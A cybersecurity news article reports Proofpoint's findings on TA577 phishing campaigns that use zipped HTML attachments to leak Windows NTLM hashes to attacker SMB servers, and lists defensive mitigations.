The notorious hacking group known as TA577 has recently changed its strategy, utilizing phishing emails to pilfer NT LAN Manager (NTLM) authentication hashes for the purpose of account hijacking. This shift in tactics has raised concerns among cybersecurity professionals.

TA577, an initial access broker (IAB) previously associated with Qbot and connected to Black Basta ransomware infections, has been observed by email security firm Proofpoint showing a preference for deploying Pikabot. However, two recent attack waves have demonstrated a different approach.

On February 26 and 27, 2024, distinct TA577 campaigns were launched, targeting hundreds of organizations worldwide. Thousands of messages were disseminated, with the aim of compromising employees' NTLM hashes. NTLM hashes are integral to Windows authentication and session security, and their theft allows attackers to potentially escalate privileges, hijack accounts, access sensitive information, evade security measures, and move laterally within compromised networks.

In these new campaigns, TA577 initiated the attacks through phishing emails. Cunningly, they appeared as replies to previous discussions—a tactic known as thread hijacking. Attached to these emails were unique ZIP archives containing HTML files. These files employed META refresh HTML tags to trigger an automatic connection to a text file on an external Server Message Block (SMB) server. Upon connection, Windows devices would automatically attempt an NTLMv2 Challenge/Response, enabling the remote attacker-controlled server to steal the NTLM authentication hashes.

Proofpoint's report highlights that TA577 employed ZIP archives to generate a local file on the host. Had the file scheme URI been sent directly in the email body, the attack would not have worked on Outlook mail clients patched since July 2023. Interestingly, the URLs used in the attacks did not deliver any malware payloads, suggesting that the primary objective was to capture NTLM hashes.

Specific artifacts discovered on the SMB servers, including the presence of the open-source toolkit Impacket, further indicate their involvement in phishing attacks. However, cybersecurity professionals have noted that multi-factor authentication must be disabled on compromised accounts for threat actors to utilize these stolen NTLM hashes to breach networks successfully.

While some vulnerability researchers speculate that the stolen hashes may serve primarily as a form of reconnaissance to identify valuable targets, Proofpoint emphasizes the need for measures to mitigate the TA577 attack. Merely restricting guest access to SMB servers is insufficient, as the attack leverages automatic authentication to external servers, bypassing the need for guest access.

To safeguard against this type of attack, configuring a firewall to block all outbound SMB connections could prove effective. Additionally, implementing email filtering that blocks messages containing zipped HTML files can help prevent connections to unsafe endpoints upon opening. Another potential protective measure is the configuration of the 'Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers' Windows group policy, which prevents the sending of NTLM hashes. However, it's important to note that this may lead to authentication issues with legitimate servers.

For organizations using Windows 11, Microsoft has introduced an additional security feature to block NTLM-based attacks over SMBs, offering a potential solution to combat TA577's new tactic.

As cyber threats continue to evolve, it is crucial for organizations to remain vigilant and implement appropriate security measures to protect their systems and sensitive information from the ever-present risk of malicious actors.